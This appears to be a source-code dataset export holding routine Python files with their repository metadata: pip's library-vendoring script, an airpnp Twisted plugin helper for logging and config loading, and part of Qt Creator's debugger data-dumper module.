elif item.name.endswith('.py'):
rewrite_file_imports(item, vendored_libs)
def rewrite_file_imports(item, vendored_libs):
"""Rewrite 'import xxx' and 'from xxx import' for vendored_libs"""
text = item.read_text()
# Revendor pkg_resources.extern first
text = re.sub(r'pkg_resources.extern', r'pip._vendor', text)
for lib in vendored_libs:
text = re.sub(
r'(\n\s*)import %s' % lib,
r'\1from pip._vendor import %s' % lib,
text,
)
text = re.sub(
r'(\n\s*)from %s' % lib,
r'\1from pip._vendor.%s' % lib,
text,
)
item.write_text(text)
def apply_patch(ctx, patch_file_path):
log('Applying patch %s' % patch_file_path.name)
ctx.run('git apply %s' % patch_file_path)
def vendor(ctx, vendor_dir):
log('Reinstalling vendored libraries')
ctx.run(
'pip install -t {0} -r {0}/vendor.txt --no-compile'.format(
str(vendor_dir),
)
)
remove_all(vendor_dir.glob('*.dist-info'))
remove_all(vendor_dir.glob('*.egg-info'))
# Cleanup setuptools unneeded parts
(vendor_dir / 'easy_install.py').unlink()
drop_dir(vendor_dir / 'setuptools')
drop_dir(vendor_dir / 'pkg_resources' / '_vendor')
drop_dir(vendor_dir / 'pkg_resources' / 'extern')
# Drop interpreter and OS specific msgpack libs.
# Pip will rely on the python-only fallback instead.
remove_all(vendor_dir.glob('msgpack/*.so'))
# Detect the vendored packages/modules
vendored_libs = []
for item in vendor_dir.iterdir():
if item.is_dir():
vendored_libs.append(item.name)
elif item.name not in FILE_WHITE_LIST:
vendored_libs.append(item.name[:-3])
log("Detected vendored libraries: %s" % ", ".join(vendored_libs))
# Global import rewrites
log("Rewriting all imports related to vendored libs")
for item in vendor_dir.iterdir():
if item.is_dir():
rewrite_imports(item, vendored_libs)
elif item.name not in FILE_WHITE_LIST:
rewrite_file_imports(item, vendored_libs)
# Special cases: apply stored patches
log("Apply patches")
patch_dir = Path(__file__).parent / 'patches'
for patch in patch_dir.glob('*.patch'):
apply_patch(ctx, patch)
@invoke.task(name=TASK_NAME)
def main(ctx):
git_root = Path(
ctx.run('git rev-parse --show-toplevel', hide=True).stdout.strip()
)
vendor_dir = git_root / 'pip' / '_vendor'
log('Using vendor dir: %s' % vendor_dir)
clean_vendor(ctx, vendor_dir)
vendor(ctx, vendor_dir)
log('Revendoring complete')
| mit | 8,446,935,301,462,685,000 | 26.729323 | 74 | 0.594902 | false |
provegard/airpnp | twisted/plugins/common.py | 1 | 3366 | # -*- coding: utf-8 -*-
# Copyright (c) 2011, Per Rovegård <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the authors nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import re
import inspect
import os.path
from zope.interface import implements
from twisted.internet import protocol
from twisted.python import log, usage
from twisted.plugin import IPlugin
from airpnp.config import config
# Log level if not specified
DEFAULT_LOG_LEVEL = 1
# Log level for Twisted's log messages
TWISTED_LOG_LEVEL = 4
class Options(usage.Options):
optParameters = [["configfile", "c", "~/.airpnprc", "The path to the Airpnp configuration file."]]
def get_calling_module():
frm = inspect.stack()[2][0]
try:
return inspect.getmodule(frm)
finally:
# http://docs.python.org/library/inspect.html#the-interpreter-stack
del frm
def patch_log(oldf):
def mylog(*message, **kw):
# Get the log level, if any
ll = kw.has_key('ll') and kw['ll'] or DEFAULT_LOG_LEVEL
# Adjust log level for Twisted's messages
module = get_calling_module().__name__
if module.startswith('twisted.') and not re.match("twisted\.plugins\..*_plugin", module):
ll = TWISTED_LOG_LEVEL
# Log if level is on or below the configured limit
if ll <= config.loglevel():
nkw = kw.copy()
nkw['system'] = "%s/%d" % (module, ll)
oldf(*message, **nkw)
return mylog
def tweak_twisted():
# Turn off noisiness on some of Twisted's classes
protocol.AbstractDatagramProtocol.noisy = False
protocol.Factory.noisy = False
# Patch logging to introduce log level support
log.msg = patch_log(log.msg)
def loadconfig(options):
rcfile = os.path.expanduser(options['configfile'])
didload = False
if os.path.isfile(rcfile):
with open(rcfile) as fd:
config.load(fd)
didload = True
return didload
| bsd-3-clause | 899,077,319,433,274,000 | 34.797872 | 102 | 0.707578 | false |
pivonroll/Qt_Creator | share/qtcreator/debugger/dumper.py | 1 | 74430 | ############################################################################
#
# Copyright (C) 2016 The Qt Company Ltd.
# Contact: https://www.qt.io/licensing/
#
# This file is part of Qt Creator.
#
# Commercial License Usage
# Licensees holding valid commercial Qt licenses may use this file in
# accordance with the commercial license agreement provided with the
# Software or, alternatively, in accordance with the terms contained in
# a written agreement between you and The Qt Company. For licensing terms
# and conditions see https://www.qt.io/terms-conditions. For further
# information use the contact form at https://www.qt.io/contact-us.
#
# GNU General Public License Usage
# Alternatively, this file may be used under the terms of the GNU
# General Public License version 3 as published by the Free Software
# Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT
# included in the packaging of this file. Please review the following
# information to ensure the GNU General Public License requirements will
# be met: https://www.gnu.org/licenses/gpl-3.0.html.
#
############################################################################
import os
import struct
import sys
import base64
import re
import time
import json
import inspect
if sys.version_info[0] >= 3:
xrange = range
toInteger = int
else:
toInteger = long
verbosity = 0
verbosity = 1
# Debugger start modes. Keep in sync with DebuggerStartMode in debuggerconstants.h
NoStartMode, \
StartInternal, \
StartExternal, \
AttachExternal, \
AttachCrashedExternal, \
AttachCore, \
AttachToRemoteServer, \
AttachToRemoteProcess, \
StartRemoteProcess, \
= range(0, 9)
# Known special formats. Keep in sync with DisplayFormat in debuggerprotocol.h
AutomaticFormat, \
RawFormat, \
SimpleFormat, \
EnhancedFormat, \
SeparateFormat, \
Latin1StringFormat, \
SeparateLatin1StringFormat, \
Utf8StringFormat, \
SeparateUtf8StringFormat, \
Local8BitStringFormat, \
Utf16StringFormat, \
Ucs4StringFormat, \
Array10Format, \
Array100Format, \
Array1000Format, \
Array10000Format, \
ArrayPlotFormat, \
CompactMapFormat, \
DirectQListStorageFormat, \
IndirectQListStorageFormat, \
= range(0, 20)
# Breakpoints. Keep synchronized with BreakpointType in breakpoint.h
UnknownType, \
BreakpointByFileAndLine, \
BreakpointByFunction, \
BreakpointByAddress, \
BreakpointAtThrow, \
BreakpointAtCatch, \
BreakpointAtMain, \
BreakpointAtFork, \
BreakpointAtExec, \
BreakpointAtSysCall, \
WatchpointAtAddress, \
WatchpointAtExpression, \
BreakpointOnQmlSignalEmit, \
BreakpointAtJavaScriptThrow, \
= range(0, 14)
def arrayForms():
return [ArrayPlotFormat]
def mapForms():
return [CompactMapFormat]
class ReportItem:
"""
Helper structure to keep temporary "best" information about a value
or a type scheduled to be reported. This might get overridden be
subsequent better guesses during a putItem() run.
"""
def __init__(self, value = None, encoding = None, priority = -100, elided = None):
self.value = value
self.priority = priority
self.encoding = encoding
self.elided = elided
def __str__(self):
return "Item(value: %s, encoding: %s, priority: %s, elided: %s)" \
% (self.value, self.encoding, self.priority, self.elided)
class Blob(object):
"""
Helper structure to keep a blob of bytes, possibly
in the inferior.
"""
def __init__(self, data, isComplete = True):
self.data = data
self.size = len(data)
self.isComplete = isComplete
def size(self):
return self.size
def toBytes(self):
"""Retrieves "lazy" contents from memoryviews."""
data = self.data
major = sys.version_info[0]
if major == 3 or (major == 2 and sys.version_info[1] >= 7):
if isinstance(data, memoryview):
data = data.tobytes()
if major == 2 and isinstance(data, buffer):
data = ''.join([c for c in data])
return data
def toString(self):
data = self.toBytes()
return data if sys.version_info[0] == 2 else data.decode("utf8")
def extractByte(self, offset = 0):
return struct.unpack_from("b", self.data, offset)[0]
def extractShort(self, offset = 0):
return struct.unpack_from("h", self.data, offset)[0]
def extractUShort(self, offset = 0):
return struct.unpack_from("H", self.data, offset)[0]
def extractInt(self, offset = 0):
return struct.unpack_from("i", self.data, offset)[0]
def extractUInt(self, offset = 0):
return struct.unpack_from("I", self.data, offset)[0]
def extractLong(self, offset = 0):
return struct.unpack_from("l", self.data, offset)[0]
# FIXME: Note these should take target architecture into account.
def extractULong(self, offset = 0):
return struct.unpack_from("L", self.data, offset)[0]
def extractInt64(self, offset = 0):
return struct.unpack_from("q", self.data, offset)[0]
def extractUInt64(self, offset = 0):
return struct.unpack_from("Q", self.data, offset)[0]
def extractDouble(self, offset = 0):
return struct.unpack_from("d", self.data, offset)[0]
def extractFloat(self, offset = 0):
return struct.unpack_from("f", self.data, offset)[0]
def warn(message):
print('bridgemessage={msg="%s"},' % message.replace('"', '$').encode("latin1"))
def showException(msg, exType, exValue, exTraceback):
warn("**** CAUGHT EXCEPTION: %s ****" % msg)
try:
import traceback
for line in traceback.format_exception(exType, exValue, exTraceback):
warn("%s" % line)
except:
pass
class Children:
def __init__(self, d, numChild = 1, childType = None, childNumChild = None,
maxNumChild = None, addrBase = None, addrStep = None):
self.d = d
self.numChild = numChild
self.childNumChild = childNumChild
self.maxNumChild = maxNumChild
self.addrBase = addrBase
self.addrStep = addrStep
self.printsAddress = True
if childType is None:
self.childType = None
else:
self.childType = d.stripClassTag(str(childType))
if not self.d.isCli:
self.d.put('childtype="%s",' % self.childType)
if childNumChild is None:
pass
#if self.d.isSimpleType(childType):
# self.d.put('childnumchild="0",')
# self.childNumChild = 0
#elif childType.code == PointerCode:
# self.d.put('childnumchild="1",')
# self.childNumChild = 1
else:
self.d.put('childnumchild="%s",' % childNumChild)
self.childNumChild = childNumChild
self.printsAddress = not self.d.putAddressRange(addrBase, addrStep)
def __enter__(self):
self.savedChildType = self.d.currentChildType
self.savedChildNumChild = self.d.currentChildNumChild
self.savedNumChild = self.d.currentNumChild
self.savedMaxNumChild = self.d.currentMaxNumChild
self.savedPrintsAddress = self.d.currentPrintsAddress
self.d.currentChildType = self.childType
self.d.currentChildNumChild = self.childNumChild
self.d.currentNumChild = self.numChild
self.d.currentMaxNumChild = self.maxNumChild
self.d.currentPrintsAddress = self.printsAddress
self.d.put(self.d.childrenPrefix)
def __exit__(self, exType, exValue, exTraceBack):
if not exType is None:
if self.d.passExceptions:
showException("CHILDREN", exType, exValue, exTraceBack)
self.d.putNumChild(0)
self.d.putSpecialValue("notaccessible")
if not self.d.currentMaxNumChild is None:
if self.d.currentMaxNumChild < self.d.currentNumChild:
self.d.put('{name="<incomplete>",value="",type="",numchild="0"},')
self.d.currentChildType = self.savedChildType
self.d.currentChildNumChild = self.savedChildNumChild
self.d.currentNumChild = self.savedNumChild
self.d.currentMaxNumChild = self.savedMaxNumChild
self.d.currentPrintsAddress = self.savedPrintsAddress
self.d.putNewline()
self.d.put(self.d.childrenSuffix)
return True
class PairedChildrenData:
def __init__(self, d, pairType, keyType, valueType, useKeyAndValue):
self.useKeyAndValue = useKeyAndValue
self.pairType = pairType
self.keyType = keyType
self.valueType = valueType
self.isCompact = d.isMapCompact(self.keyType, self.valueType)
self.childType = valueType if self.isCompact else pairType
ns = d.qtNamespace()
keyTypeName = d.stripClassTag(str(self.keyType))
self.keyIsQString = keyTypeName == ns + "QString"
self.keyIsQByteArray = keyTypeName == ns + "QByteArray"
self.keyIsStdString = keyTypeName == "std::string" \
or keyTypeName.startswith("std::basic_string<char")
class PairedChildren(Children):
def __init__(self, d, numChild, useKeyAndValue = False,
pairType = None, keyType = None, valueType = None, maxNumChild = None):
self.d = d
if keyType is None:
keyType = d.templateArgument(pairType, 0).unqualified()
if valueType is None:
valueType = d.templateArgument(pairType, 1)
d.pairData = PairedChildrenData(d, pairType, keyType, valueType, useKeyAndValue)
Children.__init__(self, d, numChild,
d.pairData.childType,
maxNumChild = maxNumChild,
addrBase = None, addrStep = None)
def __enter__(self):
self.savedPairData = self.d.pairData if hasattr(self.d, "pairData") else None
Children.__enter__(self)
def __exit__(self, exType, exValue, exTraceBack):
Children.__exit__(self, exType, exValue, exTraceBack)
self.d.pairData = self.savedPairData if self.savedPairData else None
class SubItem:
def __init__(self, d, component):
self.d = d
self.name = component
self.iname = None
def __enter__(self):
self.d.enterSubItem(self)
def __exit__(self, exType, exValue, exTraceBack):
return self.d.exitSubItem(self, exType, exValue, exTraceBack)
class NoAddress:
def __init__(self, d):
self.d = d
def __enter__(self):
self.savedPrintsAddress = self.d.currentPrintsAddress
self.d.currentPrintsAddress = False
def __exit__(self, exType, exValue, exTraceBack):
self.d.currentPrintsAddress = self.savedPrintsAddress
class TopLevelItem(SubItem):
def __init__(self, d, iname):
self.d = d
self.iname = iname
self.name = None
class UnnamedSubItem(SubItem):
def __init__(self, d, component):
self.d = d
self.iname = "%s.%s" % (self.d.currentIName, component)
self.name = None
class DumperBase:
def __init__(self):
self.isCdb = False
self.isGdb = False
self.isLldb = False
self.isCli = False
# Later set, or not set:
self.stringCutOff = 10000
self.displayStringLimit = 100
self.resetCaches()
self.childrenPrefix = 'children=['
self.childrenSuffix = '],'
self.dumpermodules = [
"qttypes",
"stdtypes",
"misctypes",
"boosttypes",
"creatortypes",
"personaltypes",
]
def resetCaches(self):
# This is a cache mapping from 'type name' to 'display alternatives'.
self.qqFormats = { "QVariant (QVariantMap)" : mapForms() }
# This is a cache of all known dumpers.
self.qqDumpers = {} # Direct type match
self.qqDumpersEx = {} # Using regexp
# This is a cache of all dumpers that support writing.
self.qqEditable = {}
# This keeps canonical forms of the typenames, without array indices etc.
self.cachedFormats = {}
# Maps type names to static metaobjects. If a type is known
# to not be QObject derived, it contains a 0 value.
self.knownStaticMetaObjects = {}
def putNewline(self):
pass
def stripClassTag(self, typeName):
if typeName.startswith("class "):
return typeName[6:]
if typeName.startswith("struct "):
return typeName[7:]
if typeName.startswith("const "):
return typeName[6:]
if typeName.startswith("volatile "):
return typeName[9:]
return typeName
def stripForFormat(self, typeName):
if typeName in self.cachedFormats:
return self.cachedFormats[typeName]
stripped = ""
inArray = 0
for c in self.stripClassTag(typeName):
if c == '<':
break
if c == ' ':
continue
if c == '[':
inArray += 1
elif c == ']':
inArray -= 1
if inArray and ord(c) >= 48 and ord(c) <= 57:
continue
stripped += c
self.cachedFormats[typeName] = stripped
return stripped
# Hex decoding operating on str, return str.
def hexdecode(self, s):
if sys.version_info[0] == 2:
return s.decode("hex")
return bytes.fromhex(s).decode("utf8")
# Hex encoding operating on str or bytes, return str.
def hexencode(self, s):
if s is None:
s = ''
if sys.version_info[0] == 2:
return s.encode("hex")
if isinstance(s, str):
s = s.encode("utf8")
return base64.b16encode(s).decode("utf8")
#def toBlob(self, value):
# """Abstract"""
def is32bit(self):
return self.ptrSize() == 4
def is64bit(self):
return self.ptrSize() == 8
def isQt3Support(self):
# assume no Qt 3 support by default
return False
def lookupQtType(self, typeName):
return self.lookupType(self.qtNamespace() + typeName)
# Clamps size to limit.
def computeLimit(self, size, limit):
if limit == 0:
limit = self.displayStringLimit
if limit is None or size <= limit:
return 0, size
return size, limit
def vectorDataHelper(self, addr):
if self.qtVersion() >= 0x050000:
size = self.extractInt(addr + 4)
alloc = self.extractInt(addr + 8) & 0x7ffffff
data = addr + self.extractPointer(addr + 8 + self.ptrSize())
else:
alloc = self.extractInt(addr + 4)
size = self.extractInt(addr + 8)
data = addr + 16
return data, size, alloc
def byteArrayDataHelper(self, addr):
if self.qtVersion() >= 0x050000:
# QTypedArray:
# - QtPrivate::RefCount ref
# - int size
# - uint alloc : 31, capacityReserved : 1
# - qptrdiff offset
size = self.extractInt(addr + 4)
alloc = self.extractInt(addr + 8) & 0x7ffffff
data = addr + self.extractPointer(addr + 8 + self.ptrSize())
if self.ptrSize() == 4:
data = data & 0xffffffff
else:
data = data & 0xffffffffffffffff
elif self.qtVersion() >= 0x040000:
# Data:
# - QBasicAtomicInt ref;
# - int alloc, size;
# - [padding]
# - char *data;
alloc = self.extractInt(addr + 4)
size = self.extractInt(addr + 8)
data = self.extractPointer(addr + 8 + self.ptrSize())
else:
# Data:
# - QShared count;
# - QChar *unicode
# - char *ascii
# - uint len: 30
size = self.extractInt(addr + 3 * self.ptrSize()) & 0x3ffffff
alloc = size # pretend.
data = self.extractPointer(addr + self.ptrSize())
return data, size, alloc
# addr is the begin of a QByteArrayData structure
def encodeStringHelper(self, addr, limit):
# Should not happen, but we get it with LLDB as result
# of inferior calls
if addr == 0:
return 0, ""
data, size, alloc = self.byteArrayDataHelper(addr)
if alloc != 0:
self.check(0 <= size and size <= alloc and alloc <= 100*1000*1000)
elided, shown = self.computeLimit(size, limit)
return elided, self.readMemory(data, 2 * shown)
def encodeByteArrayHelper(self, addr, limit):
data, size, alloc = self.byteArrayDataHelper(addr)
if alloc != 0:
self.check(0 <= size and size <= alloc and alloc <= 100*1000*1000)
elided, shown = self.computeLimit(size, limit)
return elided, self.readMemory(data, shown)
def putCharArrayHelper(self, data, size, charSize,
displayFormat = AutomaticFormat,
makeExpandable = True):
bytelen = size * charSize
elided, shown = self.computeLimit(bytelen, self.displayStringLimit)
mem = self.readMemory(data, shown)
if charSize == 1:
if displayFormat == Latin1StringFormat \
or displayFormat == SeparateLatin1StringFormat:
encodingType = "latin1"
else:
encodingType = "utf8"
childType = "char"
elif charSize == 2:
encodingType = "utf16"
childType = "short"
else:
encodingType = "ucs4"
childType = "int"
self.putValue(mem, encodingType, elided=elided)
if displayFormat == SeparateLatin1StringFormat \
or displayFormat == SeparateUtf8StringFormat \
or displayFormat == SeparateFormat:
elided, shown = self.computeLimit(bytelen, 100000)
self.putDisplay(encodingType + ':separate', self.readMemory(data, shown))
if makeExpandable:
self.putNumChild(size)
if self.isExpanded():
with Children(self):
for i in range(size):
self.putSubItem(size, data[i])
def readMemory(self, addr, size):
data = self.extractBlob(addr, size).toBytes()
return self.hexencode(data)
def encodeByteArray(self, value, limit = 0):
elided, data = self.encodeByteArrayHelper(self.extractPointer(value), limit)
return data
def byteArrayData(self, value):
return self.byteArrayDataHelper(self.extractPointer(value))
def putByteArrayValue(self, value):
elided, data = self.encodeByteArrayHelper(self.extractPointer(value), self.displayStringLimit)
self.putValue(data, "latin1", elided=elided)
def encodeString(self, value, limit = 0):
elided, data = self.encodeStringHelper(self.extractPointer(value), limit)
return data
def encodedUtf16ToUtf8(self, s):
return ''.join([chr(int(s[i:i+2], 16)) for i in range(0, len(s), 4)])
def encodeStringUtf8(self, value, limit = 0):
return self.encodedUtf16ToUtf8(self.encodeString(value, limit))
def stringData(self, value):
return self.byteArrayDataHelper(self.extractPointer(value))
def encodeStdString(self, value, limit = 0):
data = value["_M_dataplus"]["_M_p"]
sizePtr = data.cast(self.sizetType().pointer())
size = int(sizePtr[-3])
alloc = int(sizePtr[-2])
self.check(0 <= size and size <= alloc and alloc <= 100*1000*1000)
elided, shown = self.computeLimit(size, limit)
return self.readMemory(data, shown)
def extractTemplateArgument(self, typename, position):
level = 0
skipSpace = False
inner = ''
for c in typename[typename.find('<') + 1 : -1]:
if c == '<':
inner += c
level += 1
elif c == '>':
level -= 1
inner += c
elif c == ',':
if level == 0:
if position == 0:
return inner.strip()
position -= 1
inner = ''
else:
inner += c
skipSpace = True
else:
if skipSpace and c == ' ':
pass
else:
inner += c
skipSpace = False
# Handle local struct definitions like QList<main(int, char**)::SomeStruct>
inner = inner.strip()
p = inner.find(')::')
if p > -1:
inner = inner[p+3:]
return inner
def putStringValueByAddress(self, addr):
elided, data = self.encodeStringHelper(addr, self.displayStringLimit)
self.putValue(data, "utf16", elided=elided)
def putStringValue(self, value):
elided, data = self.encodeStringHelper(
self.extractPointer(value),
self.displayStringLimit)
self.putValue(data, "utf16", elided=elided)
def putAddressItem(self, name, value, type = ""):
with SubItem(self, name):
self.putValue("0x%x" % value)
self.putType(type)
self.putNumChild(0)
def putIntItem(self, name, value):
with SubItem(self, name):
self.putValue(value)
self.putType("int")
self.putNumChild(0)
def putBoolItem(self, name, value):
with SubItem(self, name):
self.putValue(value)
self.putType("bool")
self.putNumChild(0)
def putGenericItem(self, name, type, value, encoding = None):
with SubItem(self, name):
self.putValue(value, encoding)
self.putType(type)
self.putNumChild(0)
def putCallItem(self, name, value, func, *args):
try:
result = self.callHelper(value, func, args)
with SubItem(self, name):
self.putItem(result)
except:
with SubItem(self, name):
self.putSpecialValue("notcallable");
self.putNumChild(0)
def call(self, value, func, *args):
return self.callHelper(value, func, args)
def putAddressRange(self, base, step):
try:
if not addrBase is None and not step is None:
self.put('addrbase="0x%x",' % toInteger(base))
self.put('addrstep="0x%x",' % toInteger(step))
return True
except:
#warn("ADDRBASE: %s" % base)
#warn("ADDRSTEP: %s" % step)
pass
return False
def putMapName(self, value, index = None):
ns = self.qtNamespace()
typeName = self.stripClassTag(str(value.type))
if typeName == ns + "QString":
self.put('keyencoded="utf16:2:0",key="%s",' % self.encodeString(value))
elif typeName == ns + "QByteArray":
self.put('keyencoded="latin1:1:0",key="%s",' % self.encodeByteArray(value))
elif typeName == "std::string":
self.put('keyencoded="latin1:1:0",key="%s",' % self.encodeStdString(value))
else:
val = str(value.GetValue()) if self.isLldb else str(value)
if index is None:
key = '%s' % val
else:
key = '[%s] %s' % (index, val)
self.put('keyencoded="utf8:1:0",key="%s",' % self.hexencode(key))
def putPair(self, pair, index = None):
if self.pairData.useKeyAndValue:
key = pair["key"]
value = pair["value"]
else:
key = pair["first"]
value = pair["second"]
if self.pairData.isCompact:
if self.pairData.keyIsQString:
self.put('keyencoded="utf16",key="%s",' % self.encodeString(key))
elif self.pairData.keyIsQByteArray:
self.put('keyencoded="latin1",key="%s",' % self.encodeByteArray(key))
elif self.pairData.keyIsStdString:
self.put('keyencoded="latin1",key="%s",' % self.encodeStdString(key))
else:
name = str(key.GetValue()) if self.isLldb else str(key)
if index == -1:
self.put('name="%s",' % name)
else:
self.put('key="[%s] %s",' % (index, name))
self.putItem(value)
else:
self.putEmptyValue()
self.putNumChild(2)
self.putField("iname", self.currentIName)
if self.isExpanded():
with Children(self):
if self.pairData.useKeyAndValue:
self.putSubItem("key", key)
self.putSubItem("value", value)
else:
self.putSubItem("first", key)
self.putSubItem("second", value)
def putPlainChildren(self, value, dumpBase = True):
self.putEmptyValue(-99)
self.putNumChild(1)
if self.isExpanded():
with Children(self):
self.putFields(value, dumpBase)
def isMapCompact(self, keyType, valueType):
if self.currentItemFormat() == CompactMapFormat:
return True
return self.isSimpleType(keyType) and self.isSimpleType(valueType)
def check(self, exp):
if not exp:
raise RuntimeError("Check failed")
def checkRef(self, ref):
count = self.extractInt(ref.address)
# Assume there aren't a million references to any object.
self.check(count >= -1)
self.check(count < 1000000)
def readToFirstZero(self, p, tsize, maximum):
code = (None, "b", "H", None, "I")[tsize]
base = toInteger(p)
blob = self.extractBlob(base, maximum).toBytes()
for i in xrange(0, maximum, tsize):
t = struct.unpack_from(code, blob, i)[0]
if t == 0:
return 0, i, self.hexencode(blob[:i])
# Real end is unknown.
return -1, maximum, self.hexencode(blob[:maximum])
def encodeCArray(self, p, tsize, limit):
elided, shown, blob = self.readToFirstZero(p, tsize, limit)
return elided, blob
def putItemCount(self, count, maximum = 1000000000):
# This needs to override the default value, so don't use 'put' directly.
if count > maximum:
self.putSpecialValue("minimumitemcount", maximum)
else:
self.putSpecialValue("itemcount", count)
self.putNumChild(count)
def resultToMi(self, value):
if type(value) is bool:
return '"%d"' % int(value)
if type(value) is dict:
return '{' + ','.join(['%s=%s' % (k, self.resultToMi(v))
for (k, v) in list(value.items())]) + '}'
if type(value) is list:
return '[' + ','.join([self.resultToMi(k)
for k in list(value.items())]) + ']'
return '"%s"' % value
def variablesToMi(self, value, prefix):
if type(value) is bool:
return '"%d"' % int(value)
if type(value) is dict:
pairs = []
for (k, v) in list(value.items()):
if k == 'iname':
if v.startswith('.'):
v = '"%s%s"' % (prefix, v)
else:
v = '"%s"' % v
else:
v = self.variablesToMi(v, prefix)
pairs.append('%s=%s' % (k, v))
return '{' + ','.join(pairs) + '}'
if type(value) is list:
index = 0
pairs = []
for item in value:
if item.get('type', '') == 'function':
continue
name = item.get('name', '')
if len(name) == 0:
name = str(index)
index += 1
pairs.append((name, self.variablesToMi(item, prefix)))
pairs.sort(key = lambda pair: pair[0])
return '[' + ','.join([pair[1] for pair in pairs]) + ']'
return '"%s"' % value
def filterPrefix(self, prefix, items):
return [i[len(prefix):] for i in items if i.startswith(prefix)]
def tryFetchInterpreterVariables(self, args):
if not int(args.get('nativemixed', 0)):
return (False, '')
context = args.get('context', '')
if not len(context):
return (False, '')
expanded = args.get('expanded')
args['expanded'] = self.filterPrefix('local', expanded)
res = self.sendInterpreterRequest('variables', args)
if not res:
return (False, '')
reslist = []
for item in res.get('variables', {}):
if not 'iname' in item:
item['iname'] = '.' + item.get('name')
reslist.append(self.variablesToMi(item, 'local'))
watchers = args.get('watchers', None)
if watchers:
toevaluate = []
name2expr = {}
seq = 0
for watcher in watchers:
expr = self.hexdecode(watcher.get('exp'))
name = str(seq)
toevaluate.append({'name': name, 'expression': expr})
name2expr[name] = expr
seq += 1
args['expressions'] = toevaluate
args['expanded'] = self.filterPrefix('watch', expanded)
del args['watchers']
res = self.sendInterpreterRequest('expressions', args)
if res:
for item in res.get('expressions', {}):
name = item.get('name')
iname = 'watch.' + name
expr = name2expr.get(name)
item['iname'] = iname
item['wname'] = self.hexencode(expr)
item['exp'] = expr
reslist.append(self.variablesToMi(item, 'watch'))
return (True, 'data=[%s]' % ','.join(reslist))
def putField(self, name, value):
self.put('%s="%s",' % (name, value))
def putType(self, type, priority = 0):
# Higher priority values override lower ones.
if priority >= self.currentType.priority:
self.currentType.value = str(type)
self.currentType.priority = priority
def putValue(self, value, encoding = None, priority = 0, elided = None):
# Higher priority values override lower ones.
# elided = 0 indicates all data is available in value,
# otherwise it's the true length.
if priority >= self.currentValue.priority:
self.currentValue = ReportItem(value, encoding, priority, elided)
def putSpecialValue(self, encoding, value = ""):
self.putValue(value, encoding)
def putEmptyValue(self, priority = -10):
if priority >= self.currentValue.priority:
self.currentValue = ReportItem("", None, priority, None)
def putName(self, name):
self.put('name="%s",' % name)
def putBetterType(self, type):
if isinstance(type, ReportItem):
self.currentType.value = str(type.value)
else:
self.currentType.value = str(type)
self.currentType.priority += 1
def putNoType(self):
# FIXME: replace with something that does not need special handling
# in SubItem.__exit__().
self.putBetterType(" ")
def putInaccessible(self):
#self.putBetterType(" ")
self.putNumChild(0)
self.currentValue.value = None
def putNamedSubItem(self, component, value, name):
with SubItem(self, component):
self.putName(name)
self.putItem(value)
def isExpanded(self):
#warn("IS EXPANDED: %s in %s: %s" % (self.currentIName,
# self.expandedINames, self.currentIName in self.expandedINames))
return self.currentIName in self.expandedINames
def putPlainChildren(self, value):
self.putEmptyValue(-99)
self.putNumChild(1)
if self.currentIName in self.expandedINames:
with Children(self):
self.putFields(value)
def putCStyleArray(self, value):
arrayType = value.type.unqualified()
innerType = value[0].type
innerTypeName = str(innerType.unqualified())
ts = innerType.sizeof
try:
self.putValue("@0x%x" % self.addressOf(value), priority = -1)
except:
self.putEmptyValue()
self.putType(arrayType)
try:
p = self.addressOf(value)
except:
p = None
displayFormat = self.currentItemFormat()
arrayByteSize = arrayType.sizeof
if arrayByteSize == 0:
# This should not happen. But it does, see QTCREATORBUG-14755.
# GDB/GCC produce sizeof == 0 for QProcess arr[3]
s = str(value.type)
itemCount = s[s.find('[')+1:s.find(']')]
if not itemCount:
itemCount = '100'
arrayByteSize = int(itemCount) * ts;
n = int(arrayByteSize / ts)
if displayFormat != RawFormat and p:
if innerTypeName == "char" or innerTypeName == "wchar_t":
self.putCharArrayHelper(p, n, ts, self.currentItemFormat(),
makeExpandable = False)
else:
self.tryPutSimpleFormattedPointer(p, arrayType, innerTypeName,
displayFormat, arrayByteSize)
self.putNumChild(n)
if self.isExpanded():
self.putArrayData(p, n, innerType)
self.putPlotDataHelper(p, n, innerType)
def cleanAddress(self, addr):
if addr is None:
return "<no address>"
# We cannot use str(addr) as it yields rubbish for char pointers
# that might trigger Unicode encoding errors.
#return addr.cast(lookupType("void").pointer())
try:
return "0x%x" % toInteger(hex(addr), 16)
except:
warn("CANNOT CONVERT TYPE: %s" % type(addr))
try:
warn("ADDR: %s" % addr)
except:
pass
try:
warn("TYPE: %s" % addr.type)
except:
pass
return str(addr)
def tryPutPrettyItem(self, typeName, value):
if self.useFancy and self.currentItemFormat() != RawFormat:
self.putType(typeName)
nsStrippedType = self.stripNamespaceFromType(typeName)\
.replace("::", "__")
# The following block is only needed for D.
if nsStrippedType.startswith("_A"):
# DMD v2.058 encodes string[] as _Array_uns long long.
# With spaces.
if nsStrippedType.startswith("_Array_"):
qdump_Array(self, value)
return True
if nsStrippedType.startswith("_AArray_"):
qdump_AArray(self, value)
return True
dumper = self.qqDumpers.get(nsStrippedType)
if not dumper is None:
dumper(self, value)
return True
for pattern in self.qqDumpersEx.keys():
